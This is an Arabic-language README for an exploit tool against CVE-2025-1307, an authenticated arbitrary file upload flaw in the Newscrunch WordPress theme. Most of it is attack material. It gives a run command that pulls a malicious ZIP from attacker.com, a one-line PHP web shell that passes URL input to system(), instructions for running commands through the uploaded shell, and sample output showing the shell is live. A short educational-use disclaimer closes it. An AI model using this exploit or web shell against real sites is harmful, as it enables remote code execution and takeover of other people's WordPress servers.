
Newscrunch <= 1.8.4 - رفع ملفات تعسفي (مُوثق (مشترك+))
يستهدف هذا الاستغلال ثغرة حرجة (CVE-2025-1307) في قالب نيوسكرانش لووردبريس. يسمح الخلل للمستخدمين المُوثَّقين (من مستوى المشترك فما فوق) برفع ملفات عشوائية بسبب عدم وجود فحوصات الصلاحية في دالة newscrunch_install_and_activate_plugin(). يمكن أن يؤدي ذلك إلى تنفيذ أكواد عن بُعد (RCE)، مما يعرض موقع ووردبريس المتأثر للخطر بالكامل.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hقابلية الاستغلال: يتطلب حساب ووردبريس صالح مع صلاحيات مشترك أو أعلى.
✅ استغلال تلقائي لـ CVE-2025-1307
✅ كشف تلقائي لإصدار القالب الضعيف
✅ استخراج وتنفيذ تلقائي لحمولة ZIP
✅ استرجاع اسم ملف الشل ديناميكيًا من ZIP
✅ فحص تلقائي لتوفر الشل بعد الاستغلال
✅ تسجيل نظيف ومنظم لتصحيح الأخطاء
تأكد من تثبيت Python 3.x وتثبيت التبعيات المطلوبة:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
بمجرد رفع الشل بنجاح، فإنه يتيح تنفيذ الأوامر عن بُعد على النظام المستهدف. يجب وضع ملف الشل داخل أرشيف ZIP، وسيتم استخراجه تلقائيًا أثناء الاستغلال.
تأكد من أن ملف PHP shell (shell.php) داخل أرشيف ZIP. ثم قم برفع ملف ZIP باستخدام الاستغلال.
<?php system($_GET['cmd']); ?>
يمكنك تنفيذ أوامر النظام عبر المتصفح بإضافة معامل cmd إلى عنوان URL للشل:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
هذه الأداة لأغراض تعليمية وبحثية أمنية فقط. الاستغلال غير المصرح به للثغرات غير قانوني ويعاقب عليه القانون. المؤلف غير مسؤول عن أي سوء استخدام أو أضرار تسببها هذه الأداة. استخدمها بمسؤولية.
بواسطة: Nxploit | Khaled Alenazi